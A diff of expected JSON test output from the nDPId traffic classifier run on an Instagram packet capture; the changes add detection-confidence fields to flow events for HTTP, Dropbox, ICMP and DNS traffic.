 00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":324,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":324,"pkt_l4_len":290,"ts_msec":1436720901262,"pkt":"ABsv8H60QPMIw47hCABFAAE2VBZAAEAGt67AqABnUlUamZHmAFCdoJYSxR9Z0oAYDfbnvwAAAQEICgAD66tZ6cc2R0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMjQ4ODI5Xzg1Mzc4MjEyMTM3Mzk3Nl85MDk5MzY5MzRfbi5qcGc\/c2U9NyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWEuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"}
-00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-a.ak.instagram.com","url":"photos-a.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11248829_853782121373976_909936934_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
+00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-a.ak.instagram.com","url":"photos-a.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11248829_853782121373976_909936934_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1436720906017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"ts_msec":1436720906017,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5AAAIARdcjAqABq\/\/\/\/\/0RcRFwAb\/+ueyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1436720906019,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"ts_msec":1436720906019,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5EAAIARdcfAqABq\/\/\/\/\/0RcRFwAb\/+ueyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="}
 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1436720906020,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"ts_msec":1436720906020,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5IAAIARdcbAqABq\/\/\/\/\/0RcRFwAb\/+ueyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1436720906022,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1436720906022,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"ts_msec":1436720906022,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5MAAIARtB3AqABqwKgA\/0RcRFwAbz4HeyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1436720906022,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1436720906022,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1436720906025,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1436720906025,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720906025,"pkt":"\/\/\/\/\/\/\/\/ABsv8H60CABFAAA0BsVAAEARsaPAqAABwKgA\/wIIAggAILagAgEAAAACAADAqAAAAAAAAAAAAAAAAAAB"}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906070,"flow_last_seen":1436720906070,"flow_idle_time":7440000,"flow_min_l4_payload_len":613,"flow_max_l4_payload_len":613,"flow_tot_l4_payload_len":613,"flow_avg_l4_payload_len":613,"midstream":1,"ts_msec":1436720906070,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -59,64 +61,64 @@
 02359{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1436720908432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"ts_msec":1436720908432,"pkt":"QPMIw47hABsv8H60CABFAAWqu1ZAAFUGJ6cfDV00wKgAZwG7hI+o7MT1gUCDQoAQAFzmhwAAAQEIClsYbL0AA+5iFwMBBgCkPdU4R6wGSIS3keHeixTLTI9zV+il0PpZ8q91YamIsd4IZ1iA9S2D6W\/nJ4T6403w2+fJe+hdEKNsk0963CdXOEXDNkQKpXOBBE+0Y\/4Fle8ueshRyGFFEoc6PtZpKpwayy+TKxEJ4pFJyX2oGMWjaZzaOyD59AskeV\/YOll+Xm0S27uMjZKkLBkCxDNPTNhB8fh\/syM9nxdE4huEu1SgtsgSRap7+5OfSJa0vJji4Lac5HIGGpVuCAdsaWkkirxUeGhBT5KqUaH3z34YK2q9OCFDjG6zQx+K5wB6\/1tRpCV4T0Wdq9iazWqTK9fhu3Q8m7M+n+OlMsKGxDIEQhTmUFv6EsILdWY4XaXzsNt68ilI12u8FIErHj5xADP5BSss+D\/PqbyyYfj1siM7kMLTpiPXuCUljd29w+P7wtJOUzlqcHwFv60jtkmE5R7DR9LN47rlhx2ZgEX8b9nsvGl\/Z1KSCJ1m3XV6f0806axX94l9imfNEVAHweCX3kOlfFNWODbpNzNbLbpVtPn7xKRA5Y140DajcNQvyREJ7DrHWIxbEPKUq+SIMaNEJqDkl0rYnPqvJYuixcmcTK6joyocw7sF+MmuWuJzAwYoGvQacoqaNqOp0iEPlyz8x6cTF7HbzVKHlLYHsfsKMGz98miVsnjvci5f7S+qZN8wJt+ycMpErrmm5SYVwnyDiARUnY01FjBiu7oXosmSU8r8tl1Y7oQcefwWQmUMJwEVoICnXk5o\/1P1fTAJawMxQor10OxDf\/BV8+4BnkZNbktKhC4u6rpy4t9mTFTFoJnekuOgtsyuYF1D1pTovQynkNog8sbNDLg6lOVy2sSjtN38M5BrjfWP6NvWf5rAbsDm9Qvw2VUkrLm+vXfuLJeKqhTOHspJB2ZVScw6fgqCCRgXV4hbT47jXkZHPFeUj3xtv5oznldP1XEp\/Y0YyZnWCMaWATZlGVUiSYeiFbrcd70L0WujcTQSesgJzHbOqeptYMiDDVIYXi5utFDZis9FPZA2ul\/lArmvEL\/urLFDKdnXMnNjyIIqJtwWZlcpDAHOfD2KyMM51NtnpD3NXBz6ngCZNoi3DrWeJbaK2NX4FFrr9nkmfuHb0MCV8zapTpFVeDqmiCnEMr1A22q06nZsJij0BS+jpAlud6+DjOPKWljFzy06Xn15YGW3Dm07Vi1rGNQXnlLIYZbH\/Lf9VbK8rn+tf2U4X+kmR\/seSiHTIiCrfQRY82NcG+s2JE\/3RNuUUsdP3+A8UZATxsKmMNb9p9jduLcV5NSz3qcz\/E+TORnhzC5qM5iDlSbThKZAPEgvS54QGz00rdEYWdvIwL1jLd2l2yP9aEoOWrH+sNsRBCU97PG1IRhRS5jctVYyDntPEBlAbqGj6sdT5C6POfN9JdpaIsZmGaMmnU0z4bjokazZ5F6F501SFGcsFKmgoCdZLCQyyA\/CkkbqEF1LeEPM1KkE88DAsVjRhjRCz9D6VKRt8PZdtywXXp7E7yF8+4SN\/2h5CqHv4N+v+ejLyvCd2t1L4BFuJ7BTwaB6NicxBq3cWSEeADsWxC4xODPl+fmk90gThIrGh3\/E3G\/K8LjJkXPwBqDPoSCAh\/lyvY4cI9USKSjdTboTHfChgT73IzMJk4MESnvGhexHkwWw4ndKaJ88XZfXiGJCI\/GHCwJX7Zu\/IG7bV7st4TnImk\/Ds\/xEG7y3JgmTAc9wIRPfDmTaMW0XI0vpt5j1BnCLq+es4TBuh9vggrd8U5G3S+2hj2u1HQPo3wjRAM4dNo6in8nnmD4n\/\/G9yrHWQwizkMQMUhZbY0jDslavyFSGnWc0JVIhfEzkCZm+lGdYxoDPUYKjjFRFeJ8o"}
 00546{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1436720908464,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"ts_msec":1436720908464,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRcAAEABOq\/AqABnwKgAZwMDE08AAAAARQAAPFm5QABABkodwKgAZ63CKBTA+AG7+Mu3wgAAAACgAjkIlxQAAAIEBbQEAggKAAPuewAAAAABAwMG"}
-00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.471674}
+00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.471674}
 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1436720908464,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"ts_msec":1436720908464,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRcAAEABOq\/AqABnwKgAZwMDE08AAAAARQAAPFm5QABABkodwKgAZ63CKBTA+AG7+Mu3wgAAAACgAjkIlxQAAAIEBbQEAggKAAPuewAAAAABAwMG"}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908466,"flow_last_seen":1436720908466,"flow_idle_time":7440000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"ts_msec":1436720908466,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1436720908466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"ts_msec":1436720908466,"pkt":"ABsv8H60QPMIw47hCABFAAPpXL5AAEAGnQDAqABnHw1dNIPjAbuhtt+gEOOOT4AYCqMt2AAAAQEICgAD7nvwIEj8FwMBA7DXpbZuuL+a3+A25sPf3KC8vtrovZX7fcip20iH4gbDYKHRurDuUNBuKdxbaf8w5NnTQml9NHFuaiFV9xaPTEtRbbFB9QgL8vlHsxgX1jfO9ZT6YB1lbKI1n65g8AZltFoEnCsmCE1IOxVyjBVZQT7po2puEnrF+kDYe4098KgZgFIZStFzMtmo9XOmOfNP+iRYctfjIeGJz8jQ1lFBvHEsbbQIygOCYn9oDm7CXWwj2LvemnGFKWnWYwKY2HgH6zrHi9xUd7CDCihcewk3nTPbbyiC\/Oifk2F1KjvO+B1lmqoGqUOYx21p5F3Yy7giHbLKSW+ti05sAV0fAKz7Z8+aVWuucvLaUbW+dSKFEZubeujNKIbXr7vCkpaZCatjRYZUgGNtsk2NBSXDlVMA\/v3I+TpoH8L5Ft2TQGs+aL8gJ2KVF6O2+ZYxZ96KcyiQmukk5fWpPjyBq7B0lhl8\/l+87aNWAB+03OvN8FhYV+S\/gv75JF3N388CBkyP4ME8FRt4W55y8LCj1tqiL9fodHUaE6F0ridmX8h0+Dsd82vVVQdbomtwYWVDLtEOA4gG2jJjDPllVf5J8xmFGHsA6M\/TDTHEfu8LTRQc1d6jnJGUH9Eeq7GjZHoFXfcfkpY9BGbqJWKidAdwRrWxc1XI2wcOmTiqvy3W0kHXHGHBqtUOPHt80fdZz3Php0HqhVjapNrBUUzl1zXCtqo+\/D90yVXLpIbqbzqp1UOs3uY9nrVZKeWZAphdT0b38N153F9QCQaE1j\/B3yRInHVxnxDr8\/wXaBQutJGt+fT8YapiNjDh2B5Fe\/VzJjaUK9\/s\/F4+YAkFfcLJJgpkyZ1FyjpKFDmEKLJS\/hWon3VkTkSPBJyUnbR06ETQWOqnwWcQKPcsS14LaHbhuVhKdt2tBBxQtcd0OoPW2aLOEDh9uAs1wndQ8cDwLHeWOSYDiwyq7hmF978JHTDY5T9UPy1BfhkIGr1397oeYW8tQLiHwwHKS6l11zZwAq8rb2bsBNkrNvLFUBdxAJWO7YtLy1slqNoFAyDdp7eKwmaP317WVsHGvyiwNdASVNzu1pbccCR6AgqCnTrbOntDjyNK4u2jrQuFCeBAMKVe19ptimavwWdWcfiYh6zgKaavEskV4nXhC01pvDJfX\/uuk2wAy46ocrpdos3RqXm7EpLF72d506O+IxXSSlwIplmFgawKqTtoIASL2SkYHX0Y3wKxf+vCHqdiD1nEkmvwUYQ8dkrjuTHBA1bDvg=="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1436720908518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720908518,"pkt":"QPMIw47hABsv8H60CABFAAA0kN9AAFUGV5QfDV00wKgAZwG7g+MQ445PobbjVYAQANn+UgAAAQEICvAgscMAA+57"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908521,"flow_last_seen":1436720908521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1436720908521,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1436720908521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720908521,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y1AAEAGBcbAqABnLiFGoJehAFBl4Bu99+Pb34ARFTc19wAAAQEICgAD7oGa3vT1"}
-00619{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1436720908523,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1436720908523,"pkt":"ABsv8H60QPMIw47hCABFAABL7oFAAEARewHAqABnCAgICMgTADUANxLxN7ABAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1oLWEIYWthbWFpaGQDbmV0AAABAAE="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
